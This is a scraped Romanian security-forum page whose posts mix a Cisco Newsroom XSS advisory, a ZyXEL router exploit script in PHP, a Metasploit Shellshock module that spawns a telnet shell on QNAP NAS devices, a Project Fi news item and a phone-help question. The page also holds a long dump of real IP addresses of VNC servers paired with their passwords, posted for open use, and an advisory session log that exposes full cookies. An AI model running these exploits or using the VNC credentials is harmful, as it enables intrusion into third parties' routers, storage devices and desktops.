Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  7. Document Title: =============== Cisco (Newsroom) - Client Side Cross Site Scripting Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1464 Release Date: ============= 2015-04-24 Vulnerability Laboratory ID (VL-ID): ==================================== 1464 Common Vulnerability Scoring System: ==================================== 2.5 Product & Service Introduction: =============================== Cisco Systems, Inc. is an American multinational corporation headquartered in San Jose, California, that designs, manufactures, and sells networking equipment. The stock was added to the Dow Jones Industrial Average on June 8, 2009, and is also included in the S&P 500 Index, the Russell 1000 Index, NASDAQ-100 Index and the Russell 1000 Growth Stock Index. (Copy of the Homepage: http://en.wikipedia.org/wiki/Cisco_Systems ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a client-side cross site scripting web vulnerability in the official Cisco Newsroom online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-04-24: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Cisco Product: Newsroom - Web Application (Online Service) 2015 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A non persistent cross site scripting web vulnerability has been discovered in the official Cisco Newsroom online service web-application. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions data by client-side manipulated cross site requests. The vulnerability is located in the `articleId` value of the cisco newsroom service module. Remote attackers are able to inject own script codes to the vulnerable GET method request of thenewsroom module. The attack vector of the vulnerability is located on the client-side of the newsroom service web-application. The request method to inject the script code on client-side is `GET`. The injection point of the issue is the vulnerable `articleId` value in the newsroom and the script code execution point is located in the exception-handling module page. The exception-handling displays the input without secure encoding which results in the client-side script code execution. The security risk of the non-persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.4. Exploitation of the client-side cross site scripting web vulnerability requires low user interaction (click) and no privileged application user account. Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and non-persistent manipulation of affected or connected service modules. Request Method(s): [+] GET Vulnerable Service(s): [+] Cisco Newsroom Vulnerable Module(s): [+] Newsroom Vulnerable Parameter(s): [+] articleId Affected Section(s): [+] Exception-handling (Cisco Newsroom Webserver) Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers without privileged application user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Exception-Handling Vulnerability <div class="portlet-msg-error"> No Article exists with the articleId=" --><iframe src="x" onload="alert(document.cookie)">.</div> --- PoC Session Logs [GET] --- Host=newsroom.cisco.com User-Agent=Mozilla/5.0 (X11; Linux i686; rv:36.0) Gecko/20100101 Firefox/36.0 Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate Cookie=__cfduid=d0badc5a5542aab093f77ec7b2c7fcb4e1426397090; _mkto_trk=id:010-KNZ-501&token:_mch-cisco.com-1426397096496-85931; s_nr=1426612128335-Repeat; v1st=F94588C905A69AF; CP_GUTC=41.105.135.196.1426397309701574; _ga=GA1.2.915487673.1426397317; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; _ga=GA1.3.915487673.1426397317; __unam=1119172-14c1bebf7bd-10eb7fb3-50; __utma=174467517.915487673.1426397317.1426397593.1426451546.2; __utmz=174467517.1426451546.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); _actmu=161136040.703418129.1426397801884.1426397801884; FBT_LTBox_PR=yes; utag_main=v_id:014c1f3316c3001cd060059682a902042002f0090086e$_sn:3$_ss:1$_st:1426465861885$_pn:1%3Bexp-session$ses_id:1426464061885%3Bexp-session; JSESSIONID=6589D463BF249D67B9B8F40AD5973DDE; undefined=0; mygallerypersist=0; __utmc=174467517; s_cc=true; s_ria=flash%2011%7C; cdc_ut=prevacct:cisco-us%2Ccisco-newsatcisco$accesslevel:guest$ts:1426612115239$customEvents:; s_suite=cisco-us,cisco-newsatcisco; s_country=US; s_language=en; s_sq=%5B%5BB%5D%5D; s_ppv=35; ObSSOCookie=mdeeW%2BwzPp%2FHuAjfbay5gq9VCphOfELvYcvAbmb10rcmkqL%2BoN5WuZW3zD%2BWp3iH%2B0Bdm3eP7th2faHmHu5fk2aOV1lgAc8IjLwgkabZNO6g9soQJYR%2Bp1j%2Bakulkb4q%2BMiybdSb2wiTgPaH26TXgvtqARFPLLeVxeQ3VmDd121e00naIL8JzpatIZ%2BATa0svqvtsEKd2W5n9MNimkrvvb7LeslMcpTbAtC3p%2FfQ0ulKkvun4e0VNGCOedx51KoHFbvVyLMkkKkCvWp1N032L0KoF21ITcCYKwH7TGwQeBGg5PYKbBJsJlt%2FpfKF4dEZwtEI6PuGzMtF1b5grDwdw%2FjHlku%2FIHPR1oLGp3HWwEU9aHrMDzb4BGFoBaI3rAzU; wasOnLoginPage=false; loginPageReferrer=; PAPPS-Loc=papps-prod1.cisco.com; _gat_UA-23583380-1=1; _gat_newsroom=1; _gat_marketing=1; s_dfa=cisco-us%2Ccisco-newsatcisco; s_pv=newsroom.cisco.com%2Fexecbio-detail Connection=keep-alive Reference(s): http://newsroom.cisco.com Solution - Fix & Patch: ======================= The vulnerability has been fixed/patched by the cisco developer team since 24th april 2015. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerability in the newsroom service is estimated as medium. (CVSS 2.5) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  8. <?php /* Exploit Title : ZYXEL remote configuration editor / Web Server DoS Date : 23 April 2015 Exploit Author : Koorosh Ghorbani Site : http://8thbit.net/ Vendor Homepage : http://www.zyxel.com/ Platform : Hardware Tested On : ZyXEL P-660HN-T1H_IPv6 Firmware Version: 1.02(VLU.0) -------------------------- Unattended remote access -------------------------- ZYXEL Embedded Software does not check Cookies And Credentials on POST method so attackers could changes settings and view pages with post method . -------------------------- DoS Web Server -------------------------- sending empty Post to admin pages will crash internal web server and router needs to hard reset . */ $banner = " ___ _______ _ ____ _ _______ \r\n" . " / _ \__ __| | | _ \(_)__ __|\r\n" ." | (_) | | | | |__ | |_) |_ | | \r\n" ." > _ < | | | '_ \| _ <| | | | \r\n" ." | (_) | | | | | | | |_) | | | | \r\n" ." \___/ |_| |_| |_|____/|_| |_| \r\n" ." \r\n" ." \r\n"; print $banner; function Post($packet,$host) { try { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $host); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $packet); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"); curl_setopt($curl, CURLOPT_REFERER, "Referer: http://192.168.1.1/cgi-bin/WLAN_General.asp"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($curl); curl_close($curl); return $result; }catch (Exception $e ){ echo $e->getMessage(); return "" ; } } if(sizeof($argv) < 3) { print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n"; exit(1); } $host = $argv[1]; $password = urlencode($argv[2]); $packet= "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=0.0.0.0&WLANCfgRadiusServerPort=1812&WLANCfgRadiusServerKey=&Qos_Sel=None&doSubmitFlag=0" ; $target = "http://$host/cgi-bin/WLAN_General.asp"; if(strlen(Post($packet,$target)) > 0){ print "Seems Changed !"; }else{ print "Humm , No Chance !"; } //DoS : Post("",$target) ; ?> Source: http://packetstorm.wowhacker.com/1504-exploits/zyxel-dos.txt
  9. Google launches its own mobile network for Nexus 6 owners Google is now a mobile carrier. Today the company has made official its plan to offer wireless service to owners of its Nexus 6 smartphone. It's called Project Fi, and Google is launching an early invite program beginning today. "Similar to our Nexus hardware program, Project Fi enables us to work in close partnership with leading carriers, hardware makers, and all of you to push the boundaries of what's possible," the company wrote in a blog post. The service is only available for the Nexus 6 and requires a special SIM card for Project FI — it will work with both existing Nexus 6 devices and new ones. Google is says that right now the service is only available as an "early access program," and during that program it won't work on other phones. Google's new offering is unique in that the company will charge consumers only for the data they use rather than hit them with a flat monthly fee that comes with a preset amount of data. If you fail to use all the data you've paid for, Google will refund you the difference. If you go over your plan, Google will simply charge you at a pro-rated rate of $10 per GB. In other words, if you pay for data and don't use it, you get refunded. If you don't buy data and use it, you end up paying the same amount. There are no family plans available, but neither does it require a contract of any kind. As reported previously, Google will operate its wireless service with the help of both T-Mobile and Sprint; customers will have access to both networks, and Google's service will intelligently switch between them and Wi-Fi to maintain strong reception. "We developed new technology that gives you better coverage by intelligently connecting you to the fastest available network at your location whether it's Wi-Fi or one of our two partner LTE networks," the company said. Project Fi also supports voice calls and texting over Wi-Fi, lending subscribers more flexibility and how and where they can communicate with their contacts. Google also says it's using secure tech (there's a key that shows up in your menu bar) for when you're using public Wi-Fi hotspots. Google says Project Fi phone numbers "live in the cloud," according to Google, enabling you to text and place voice calls from a laptop or tablet without your actual phone nearby. When you are on the phone, Google says calls can seamlessly transition to LTE when you leave a Wi-Fi network. Google seems to be using the new, combined Hangouts / Google Voice infrastructure in some way for Fi, as its FAQ references it often. If you're interested in being part of Google's mobile experiment, the signup page is here. Google says it'll be sending out a small number of invites every week starting now. Sursa: Google launches its own mobile network for Nexus 6 owners | The Verge
  10. Salut,am avut o problema la telefonul meu cu softul, l-am dus intr-un service si baietii de acolo mi-au instalat Cyanogenmod 11 , toate bune si frumoase cand l-am luat acasa am vrut sa activez wifi surpriza nu se activa,am cautat detalii pe net si am vazut ca nu este compatibil modelul meu de telefon (Sony Xperia L) cu Cyanogenmod 11. Intrebarea mea este urmatoarea: cum trec la Cyanogenmod 12 sau sa revin la softul ce il avea inainte de al duce la service (cel original). Astept ceva detali si daca se poate un tutorial ceva,mersi o zi buna.
  11. # Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] # Employer homepage: http://www.securegroup.it # Vendor homepage: http://www.qnap.com # Version: All Turbo NAS models except TS-100, TS-101, TS-200 # Tested on: TS-1279U-RP # CVE : 2014-6271 # Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61 ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/d3vpp/metasploit-modules ## require 'msf/core' require 'net/telnet' class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::CommandShell def initialize(info = {}) super(update_info(info, 'Name' => 'QNAP admin shell via Bash Environment Variable Code Injection', 'Description' => %q{ This module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection. Affected products: All Turbo NAS models except TS-100, TS-101, TS-200 }, 'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-6271'], #aka ShellShock ['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61'] ], 'Platform' => ['unix'] )) register_options([ OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']), OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993']) ], self.class) end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; echo; /usr/bin/id" }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE vprint_error("Connection failed") return Exploit::CheckCode::Unknown end if !res return Exploit::CheckCode::Unknown elsif res.code== 302 and res.body.include? 'uid' return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit_telnet() telnetport = datastore['LTELNET'] print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}") print_status("#{rhost}:#{rport} - Sending exploit") begin sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) if sock print_good("#{rhost}:#{rport} - Backdoor service spawned") add_socket(sock) else fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not spawned") end print_status "Starting a Telnet session #{rhost}:#{telnetport}" merge_me = { 'USERPASS_FILE' => nil, 'USER_FILE' => nil, 'PASS_FILE' => nil, 'USERNAME' => nil, 'PASSWORD' => nil } start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not handled") end return end def run begin telnetport = datastore['LTELNET'] res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &" }) rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable => e fail_with(Failure::Unreachable, e) ensure disconnect end exploit_telnet() end end Source
  12. Sunt vreo 500 la numar, cred ca gasiti ceva bun p'acolo. Am sa va mai postez, cel putin odata pe saptamana. Hai sariti sa va puneti redirecturile ca stiu ca asta faceti . Ma-ti terorizat cu ele, cum le vad cum le sterg... . 2.109.240.90:5900-null-[None] 112.216.248.234:5900-1-[qq4ero7hd8sv6] 177.21.110.10:5900-1234-[None] 177.21.52.62:5900-123456-[cameras ( 192.168.13.1 ) - application mode] 112.7.121.152:5900-1-[pc-201304141208] 112.16.76.193:5900-null-[installer@installer-desktop] 112.16.93.13:5900-null-[1570020POS99] 112.2.50.149:5900-password-[110301188-01] 112.2.12.21:5900-password-[110301188-01] 112.2.50.170:5900-password-[110301188-01] 112.2.55.194:5900-password-[110301188-01] 112.2.50.188:5900-password-[110301188-01] 112.2.49.27:5900-password-[110301188-01] 121.34.251.19:5900-null-[None] 121.34.124.66:5900-1-[2014_2015jthssm] 121.44.114.7:5900-1-[None] 121.67.212.16:5900-null-[None] 121.67.212.27:5900-null-[None] 121.67.212.76:5900-null-[None] 121.67.212.70:5900-null-[None] 121.67.212.11:5900-null-[None] 121.67.212.12:5900-null-[None] 121.67.212.71:5900-null-[None] 121.67.212.77:5900-null-[None] 121.67.212.73:5900-null-[None] 121.67.212.72:5900-null-[None] 121.67.212.42:5900-null-[None] 121.67.212.30:5900-null-[None] 121.67.212.23:5900-null-[None] 121.67.212.17:5900-null-[None] 121.67.212.13:5900-null-[None] 121.67.212.22:5900-null-[None] 121.67.212.15:5900-null-[None] 121.67.212.54:5900-null-[None] 121.67.212.41:5900-null-[None] 121.67.212.40:5900-null-[None] 121.67.212.69:5900-null-[None] 121.67.212.28:5900-null-[None] 121.67.212.47:5900-null-[None] 121.67.212.53:5900-null-[None] 121.67.212.32:5900-null-[None] 121.67.212.37:5900-null-[None] 121.67.212.26:5900-null-[None] 121.66.39.21:5900-null-[None] 121.67.212.55:5900-null-[None] 121.67.212.57:5900-null-[None] 121.67.212.62:5900-null-[None] 121.67.212.79:5900-null-[None] 121.8.181.165:5900-123-[gaoke-9pdwfvlke] 121.7.3.19:5900-1234-[d946gz ( 192.168.3.50 ) - application mode] 121.6.165.191:5900-1234-[d946gz ( 192.168.20.50 ) - application mode] 121.66.38.203:5900-1234-[nvr28:0] 121.12.167.104:5900-123456-[OTHER] 121.53.51.134:5900-123456-[mvodtown:0] 121.67.62.28:5900-12345678-[None] 121.67.62.25:5900-12345678-[None] 121.67.62.14:5900-12345678-[pc014] 121.67.62.24:5900-12345678-[None] 121.67.62.18:5900-12345678-[None] 121.67.62.22:5900-12345678-[None] 211.2.26.47:5900-passwd-[yuichi-macmini] 121.67.212.35:5900-null-[None] 110.5.17.67:5900-null-[oruser@ubuntu12-04] 110.20.229.51:5900-null-[BJE-CP1:0.0] 110.10.133.206:5900-null-[None] 110.10.133.204:5900-null-[None] 110.10.133.191:5900-null-[None] 110.10.133.133:5900-null-[None] 110.10.133.135:5900-null-[None] 110.10.133.134:5900-null-[None] 110.6.191.205:5900-admin123-[2012-20110101gg ( 110.6.191.205, 172.22.169.1, 169.254.131.242 )] 110.15.211.98:5900-0000-[pm06 ( 110.15.211.98 ) - application mode] 110.10.133.202:5900-null-[None] 110.10.133.176:5900-null-[None] 154.127.117.82:5900-1-[None] 117.172.163.200:5900-123-[PC-201204091653] 123.242.169.245:5900-123-[i01068] 123.242.156.6:5900-123456-[None] 88.2.196.195:5900-null-[None] 88.0.247.182:5900-null-[Cubie:0.0] 88.2.235.169:5900-null-[None] 88.5.23.112:5900-null-[QEMU] 88.12.13.187:5900-null-[Device 10001] 88.12.5.96:5900-null-[Device 10001] 88.12.44.45:5900-null-[Device 10001] 88.12.152.95:5900-null-[QEMU] 46.229.153.82:5900-null-[x11] 88.14.143.89:5900-null-[FORMACION3] 88.14.100.165:5900-null-[QEMU] 88.14.111.235:5900-null-[QEMU] 88.14.121.18:5900-null-[QEMU] 79.143.179.236:5900-null-[QEMU (static-farmmania)] 37.123.140.247:5900-null-[None] 78.70.20.118:5900-null-[x11] 37.123.141.88:5900-null-[None] 78.70.192.224:5900-null-[None] 37.123.186.100:5900-null-[None] 130.237.67.12:5900-null-[bajibabu@fant] 88.7.75.115:5900-null-[bfa@MicroServer] 79.143.161.228:5900-null-[tuco@dnevna] 212.116.80.42:5900-null-[None] 85.30.34.137:5900-null-[None] 85.30.55.0:5900-null-[None] 85.30.60.206:5900-null-[None] 85.30.154.152:5900-null-[None] 85.30.155.162:5900-null-[None] 213.66.136.156:5900-null-[None] 213.66.136.32:5900-null-[None] 85.30.57.208:5900-null-[None] 193.13.110.248:5900-null-[None] 193.13.36.238:5900-null-[None] 195.19.76.233:5900-null-[QEMU (rosabs3-abf-worker1)] 178.78.60.68:5900-1-[rk7server ( 192.168.0.99 ) - service mode] 5.133.132.127:5900-1-[None] 130.237.25.250:5900-null-[None] 121.8.202.84:5900-1-[gdeie1703160] 121.6.151.139:5900-1-[nlbugis-pc ( 192.168.1.100 )] 121.12.120.72:5900-null-[QEMU (we5dg)] 121.14.195.68:5900-null-[Xen-cms] 121.1.198.99:5900-null-[wavecast@wavecast-01] 128.2.90.39:5900-null-[None] 128.2.144.215:5900-null-[student@kali1] 128.2.144.136:5900-null-[student@kali1] 128.2.144.139:5900-null-[student@kali1] 128.2.144.138:5900-null-[student@kali1] 128.2.144.140:5900-null-[student@kali1] 128.6.17.244:5900-null-[Device 10002] 128.9.233.14:5900-null-[QEMU (instance-00000422)] 128.9.233.16:5900-null-[QEMU (instance-000000b5)] 128.9.233.18:5900-null-[QEMU (instance-000000b3)] 128.9.233.11:5900-null-[QEMU (instance-00000423)] 128.9.233.13:5900-null-[QEMU (instance-00000426)] 128.9.233.12:5900-null-[QEMU (instance-0000029b)] 128.2.214.34:5900-null-[None] 128.2.245.163:5900-null-[None] 128.2.245.165:5900-null-[None] 128.2.245.161:5900-null-[None] 128.6.17.243:5900-null-[None] 128.2.144.135:5900-null-[student@kali1] 88.12.42.82:5900-123-[DEHESASERVER] 187.58.122.9:5900-123-[svr01 ( 192.168.25.201 ) - service mode] 95.31.221.127:5900-123-[guestmsk] 121.8.181.165:5900-123-[gaoke-9pdwfvlke] 121.13.219.5:5900-123-[cpo-mis-5815] 95.31.137.96:5900-123-[maksimov@x01-policase-prod] 121.17.52.72:5900-123-[pc-20100901yzle] 88.2.222.98:5900-1234-[None] 88.3.119.122:5900-1234-[None] 78.70.14.226:5900-1234-[EXTER T40m] 5.228.58.178:5900-1234-[None] 121.6.181.205:5900-1234-[mah_pms ( 192.168.22.4 ) - application mode] 121.7.152.30:5900-1234-[d946gz ( 192.168.3.50 ) - application mode] 121.6.165.191:5900-1234-[d946gz ( 192.168.20.50 ) - application mode] 88.12.48.199:5900-12345-[WinVNC] 88.10.113.245:5900-12345-[Minerva Mac Server] 130.236.136.28:5900-12345-[None] 187.58.126.213:5900-12345-[SERVIDOR Microsoft Windows Server 2003 R2, Enterprise Edition Service Pack 2 (build 3790)] 128.8.138.146:5900-12345-[Julie Berry’s iMac] 212.116.173.41:5900-123456-[None] 212.116.173.42:5900-123456-[None] 81.200.27.43:5900-123456-[Encelad] 121.12.167.104:5900-123456-[OTHER] 107.6.13.189:5900-123456-[QEMU (WIN)] 107.6.44.202:5900-123456-[win-62fghkhguos ( 10.10.20.6, 107.6.44.202, 169.254.235.96 ) - service mode] 88.11.135.233:5900-12345678-[DVR [000322091864]] 121.6.146.222:5900-12345678-[posready7-pc ( 121.6.146.222, 192.168.1.1, 192.168.192.1 ) - service mode] 121.6.146.222:5900-1234567890-[posready7-pc ( 121.6.146.222, 192.168.1.1, 192.168.192.1 ) - service mode] 116.88.94.171:5900-0000-[server’s Mac mini] 95.215.99.206:5900-0000-[LKDS-ÏÊ] 79.143.81.46:5900-q1w2e3-[None] 88.0.26.187:5900-qwerty123-[svrppv ( 192.168.31.1 )] 88.5.181.31:5900-qwerty123-[srvppv ( 192.168.1.2, 192.168.25.60, 192.168.25.61 ) - service mode] 88.3.164.90:5900-qwerty123-[svrppv ( 192.168.17.1 )] 88.11.80.10:5900-qwerty123-[svrppv ( 192.168.37.1 )] 88.13.1.162:5900-qwerty123-[svrppv ( 192.168.10.1 )] 88.13.4.146:5900-qwerty123-[svrppv ( 192.168.28.1 )] 88.13.73.144:5900-qwerty123-[svrppv ( 192.168.60.1 )] 88.13.9.8:5900-qwerty123-[svrppv ( 192.168.18.2 )] 88.13.52.137:5900-qwerty123-[svrppv ( 192.168.13.1 )] 88.12.67.68:5900-qwerty123-[svrppv ( 192.168.25.1 )] 88.13.3.176:5900-qwerty123-[svrppv ( 192.168.61.2 )] 88.3.162.166:5900-qwerty123-[None] 88.13.62.54:5900-remote-[compaq] 128.2.75.121:5900-test-[Jim Hawthorne’s iMac] 121.7.222.155:5900-support-[None] 88.12.54.153:5900-master-[VC Project 'visu'] 107.6.13.71:5900-abc123-[QEMU (1066-eh-web1)] 121.1.254.150:5900-null-[192.168.0.190 ] 52.16.163.163:5900-null-[None] 52.16.142.254:5900-null-[nobody's x11 desktop (linerishana:1)] 52.16.170.223:5900-null-[amazona-c323d46] 52.1.226.14:5900-null-[None] 52.10.10.17:5900-null-[None] 24.13.243.196:5900-null-[exercise] 24.15.192.124:5900-null-[art@Ubu] 24.4.40.162:5900-1-[David’s iMac] 24.9.52.142:5900-null-[user@user-Dimension-4550] 81.7.10.87:5900-null-[QEMU (vmcentos7)] 81.7.122.3:5900-null-[www - VirtualBox] 81.9.153.58:5900-null-[x11] 81.12.145.216:5900-null-[D42L7H3J] 81.10.106.106:5900-null-[PACSSHOBAN] 24.9.167.171:5900-null-[None] 81.24.131.251:5900-null-[Qt for Embedded Linux VNC Server] 81.30.158.229:5900-null-[x11] 81.33.27.109:5900-null-[Device 10001] 81.33.102.60:5900-null-[Device 10001] 81.35.177.104:5900-null-[QEMU] 81.36.24.96:5900-null-[QEMU] 81.29.252.196:5900-1-[alborz-ics ( 10.51.222.171, 10.60.4.235, 81.29.252.196, 192.168.231.10 ) - service mode] 81.44.43.134:5900-null-[OEM-MAMTWY7H6GU] 81.52.169.18:5900-null-[SERVERTEC] 81.65.55.235:5900-null-[KVM-SERVEUR] 81.82.77.131:5900-null-[None] 81.33.25.134:5900-null-[None] 81.83.6.135:5900-null-[x11] 81.57.207.3:5900-null-[skyangeli@vDebian] 81.84.120.41:5900-null-[root's x11 desktop (VVServer:0)] 81.89.12.66:5900-null-[QEMU (instance-00000043)] 81.102.83.136:5900-null-[donald@ubuntu] 81.109.37.232:5900-null-[OEM-OASBVV2TX75] 81.133.6.182:5900-null-[hulk:0] 81.133.219.45:5900-null-[None] 81.134.14.139:5900-null-[TP] 81.135.94.240:5900-null-[root's x11 desktop (ExzaRaspberry:1)] 81.136.246.106:5900-null-[E1101] 81.138.38.34:5900-null-[R6_01:0] 81.138.38.45:5900-null-[R5_01:0] 81.133.113.92:5900-null-[None] 81.138.237.173:5900-null-[DPFTP] 81.140.69.34:5900-null-[IGEL-00E0C5101D25:0] 81.155.232.251:5900-null-[Cinema] 81.164.56.75:5900-null-[WindowsCE] 81.149.198.21:5900-null-[clarks@clarks-PowerEdge-T300] 81.149.200.232:5900-null-[attainserver@attainserver-M68MT-S2] 81.170.151.207:5900-null-[None] 81.170.189.171:5900-null-[None] 81.151.50.143:5900-null-[henryg@zoom-mint1] 81.169.245.238:5900-null-[QEMU (fw)] 81.170.252.54:5900-null-[None] 81.170.178.57:5900-null-[None] 81.174.49.178:5900-null-[perla:0.0] 81.173.145.34:5900-null-[martin@ubuntu-buddah] 81.169.209.226:5900-null-[None] 81.175.160.82:5900-null-[x11] 81.175.147.175:5900-null-[QEMU (ubuntu-dev)] 81.175.165.92:5900-null-[x11] 81.153.21.181:5900-null-[None] 81.158.180.254:5900-null-[None] 81.174.15.163:5900-null-[desknow@00-DESKNOW] 81.183.193.131:5900-null-[x11] 81.183.216.30:5900-null-[Win XP Prof ALU] 81.170.69.64:5900-null-[plex@plex] 81.186.253.166:5900-null-[None] 81.184.220.147:5900-null-[VNC server via dispmanx] 81.184.247.54:5900-null-[marcoslinux:0] 81.174.37.50:5900-1-[None] 81.193.145.161:5900-null-[root's x11 desktop (VVServer:0)] 81.190.144.40:5900-1-[kasa ( 192.168.1.101 ) - service mode] 81.187.202.12:5900-null-[PADPLOTTER3] 81.196.109.68:5900-null-[QEMU (virt_admin)] 81.192.114.67:5900-null-[root@localhost.localdomain] 81.198.121.165:5900-null-[None] 81.201.57.152:5900-null-[None] 81.180.115.84:5900-null-[None] 81.206.168.44:5900-1-[x0vncserver] 81.209.111.52:5900-null-[x11] 81.209.112.165:5900-null-[x11] 81.210.113.130:5900-null-[None] 81.214.131.128:5900-null-[CATI] 